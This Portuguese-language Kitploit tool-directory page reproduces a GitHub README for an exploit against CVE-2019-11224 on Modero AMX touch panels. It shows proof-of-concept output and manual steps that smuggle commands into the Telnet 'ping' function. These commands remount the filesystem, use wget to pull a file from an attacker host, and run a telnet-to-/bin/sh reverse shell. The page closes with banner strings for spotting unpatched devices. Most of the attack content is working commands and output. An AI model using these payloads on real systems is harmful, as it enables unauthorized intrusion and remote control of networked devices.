Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-11224 — Execução de Código no Modero AMX (CVE-2019–11224) | Kitploit
Ferramentas/GitHubGitHub/insecurities/cve-2019-11224
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHubinsecurities/cve-2019-11224

CVE-2019-11224

Execução de Código no Modero AMX (CVE-2019–11224)

Ver Repositório
2há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Modero AMX Code Execution (CVE-2019-11224)

Este repositório contém algumas fontes sobre CVE-2019–11224 (https://link.medium.com/zukA0oCnV8) porque notei que o link não funciona mais no site oficial do NIST. Os dispositivos Modero AMX são essencialmente painéis de toque para salas de reunião; podem ser observados em muitos ambientes diferentes e geralmente têm o Telnet aberto. Como eles emulam um console pouco ideal usando Telnet, existe uma vulnerabilidade de injeção de código através da função "ping" usando separadores de comandos.

Desde que criei originalmente este repositório GitHub e mexi em dispositivos AMX, criei um POC e um processo de exploração para obter reverse shells com esta vulnerabilidade. Espero que te traga alegria :}

🐢 Obtendo Shells com amx_pwn.py

Escrevi um POC amx_pwn.py que deve ser útil. Exemplo de saída abaixo:

root@kitploit:~
┌──(cozyfox㉿submarine)-[/CVE-2019-11224]
└─$ python3 amx_pwn.py -t 192.168.0.21 -fs 192.168.0.41 -fn something.jpg -v 1
[!] Your current settings are:
[*] Target: 192.168.0.21
[*] FileServer and Filename URL: http://192.168.0.41/something.jpg
[*] Verbosity: 1
(^_^)7  Continue? (Y/N): y
[*] RUNNING
Telnet(192.168.0.21,23): recv b'\xff\xfb\x01\r\nWelcome to Modero v2.86.50 Copyright (C) AMX '
Telnet(192.168.0.21,23): IAC WILL 1
Telnet(192.168.0.21,23): recv b'LLC 2002-2009\r\n>'
b'\r\nWelcome to Modero v2.86.50 Copyright (C) AMX LLC 2002-2009\r\n>'
Telnet(192.168.0.21,23): send b"ping ;CMD=$'\\x20-o\\x20remount,rw\\x20/'&&mount$CMD\r\n"
Telnet(192.168.0.21,23): recv b'\xff\xfc\x01'
Telnet(192.168.0.21,23): IAC WONT 1
<..cut to remove clutter...>
Telnet(192.168.0.21,23): recv b'\xff\xfc\x01'
Telnet(192.168.0.21,23): IAC WONT 1
taking a snooze
Telnet(192.168.0.21,23): send b"ping ;CMD=$'\\x20http://192.168.0.41/something.jpg'&&wget$CMD\r\n"
taking a snooze
...

Os passos para fazer isto manualmente podem ser vistos abaixo:

  • Remonte o sistema de arquivos como R/W:
    ping ;CMD=$'\x20-o\x20remount,rw\x20/'&&mount$CMD
  • Hospede um arquivo acessível ao dispositivo - O conteúdo deve ser o seguinte:
    Nota: Você precisa de dois listeners no netcat, um será para entrada, o outro para saída.
    telnet {YOUR_IP} 1332 | /bin/sh | telnet {YOUR_IP} 1333
  • Baixe o seu arquivo - NOTA: Deve ser um IP e servido via HTTP. Esses dispositivos são antigos.
    ping ;CMD=$'\x20http://{YOUR_SYSTEM}/{YOUR_FILE}'&&wget$CMD
  • Execute o seu arquivo e capture shells:
    ping ;CMD=$'\x20{YOUR_FILE}'&&/bin/sh$CMD

👁️ Identificando o Serviço Modero AMX

Verifique os banners do Telnet (normalmente na porta 23) contendo: Welcome to Modero: ou Copyright (C) AMX LLC. Procure por versões anteriores a 2.87.13.

Baixar ferramenta